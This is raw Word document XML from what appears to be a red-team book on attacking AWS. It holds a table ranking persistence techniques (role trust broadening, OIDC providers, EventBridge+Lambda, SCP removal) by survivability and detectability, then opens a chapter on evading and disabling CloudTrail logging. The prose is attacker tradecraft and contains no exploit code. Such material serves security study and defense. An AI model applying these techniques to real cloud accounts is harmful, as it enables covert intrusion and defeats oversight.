          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>organizations:DetachPolicy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>organizations:DeletePolicy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>) can silently lift restrictions that the operator would otherwise hit. The SCP history is not easily queryable in the console; the CloudTrail event in the management account is the only record, and many organizations do not monitor management-account CloudTrail with the same rigor as workload accounts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE0E52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Service-level trusts.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">Adding a new trusted service to AWS Security Hub, GuardDuty, or Config (via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>organizations:EnableAWSServiceAccess</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>) or modifying the designated administrator account for a service (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>organizations:RegisterDelegatedAdministrator</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>) can subtly broaden the attacker's authority. A delegated administrator of GuardDuty in a single-account context means the attacker can disable GuardDuty's own findings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC4443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Account-level defaults.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>s3:PutBucketPublicAccessBlock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> at account level, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ec2:ModifyEbsDefaultKmsKeyId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>iam:SetDefaultPolicyVersion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> on customer-managed policies — each of these is a persistence primitive in the sense that it changes what </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>future</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> objects look like.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D78CDAA" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>15.5  A persistence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4040"/>
        <w:gridCol w:w="1478"/>
        <w:gridCol w:w="1445"/>
      </w:tblGrid>
      <w:tr w:rsidR="00000000" w14:paraId="6CA5717F" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:gridSpan w:val="4"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E76BFB6"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15.1 — Persistence primitives ranked by survivability and detectability. A pragmatic operator's default is to establish two primitives from different families, so that losing one does not end the campaign.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="548188D2" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="220000D0"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Primitive</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="752BDFC9"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IAM required</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F351303"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Survivability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="222730A2"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Detectability</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="56ED73B1" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="086AD58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Access key on service user</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="058F6655" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>iam:CreateAccessKey</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="695571C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 (rotation)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0DFA507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Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="4C6E8EAE" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E7C294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Role trust broadening</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C49BE00" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>iam:UpdateAssumeRolePolicy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="240ADB0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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F82150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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="407CA7F7" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="486485D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OIDC provider addition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="536EB69C" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>iam:CreateOpenIDConnectProvider</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5960590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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60448A5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low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="3415979D" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="09447F9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Cognito identity pool abuse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="23DF2A3B" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>cognito-identity:UpdateIdentityPool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4363EEA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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6BC65E1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Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="6B0AB248" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B663F7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EventBridge+Lambda</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C9DCBD6" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>events:PutRule</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>lambda:UpdateFunctionCode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2CA1CA8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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55E270B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Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="7D058846" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14666EE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Launch template / AMI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38B8E8AF" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ec2:CreateLaunchTemplateVersion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28C362D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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6AB3566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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="348892B1" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5849D8B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Identity Center permission set</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="240CDFD8" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>sso-admin:CreatePermissionSet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1CF42DC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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E8BCEC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low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="313DFC96" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7670677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SCP removal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="513D3D68" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>organizations:DetachPolicy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3569933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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E41E6B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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="7BCA20FB" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="320FE01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 bucket notification → Lambda</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26154EF1" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>s3:PutBucketNotification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A8232F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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0FE914A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Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="146046FB" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Key takeaways</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8FC028" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Persistence in AWS divides into identity, compute, and configuration families; the most durable primitives live outside the workload accounts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CBA87B" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Role-trust modification is superior to new-user creation because it avoids access-key rotation and blends with vendor-integration patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0B4A61" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Federation primitives (Cognito identity pools, GitHub OIDC roles, new OIDC providers) are among the most invisible; few defenders enumerate the provider list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753140F4" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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EventBridge + existing Lambda is the canonical compute-persistence pair: new rule, no new function, benign-looking footprint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D95C90C" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Identity Center permission sets and SCP manipulation live at the Organizations root; investigations of a single compromised account will not discover them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764ECDAA" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Chapter 16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:br/>
        <w:t>Defense Evasion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4834D9C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CloudTrail is the defender's primary narrative source. Every evasion technique in this chapter therefore orbits around the same question: what ends up in CloudTrail, and can the attacker bend that record? This chapter covers four evasion classes, ordered by the operational risk they carry. The lowest-risk class is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>blending</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">: act with the identities, the regions, the volumes, and the timing the defender already expects. The mid-risk class is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>narrowing the log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">: choose identities and actions that produce minimal or benign CloudTrail entries. The high-risk class is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>diverting or disabling the log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>: redirect CloudTrail output to an attacker-controlled destination, stop trails, or disable services. The class at the high end of risk should be considered only when the alternative is mission failure — disabling CloudTrail is the most reliable way to tell a defender that they are under attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E93C492" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>16.1  Blending with automation</w:t>
      </w:r>
    </w:p>
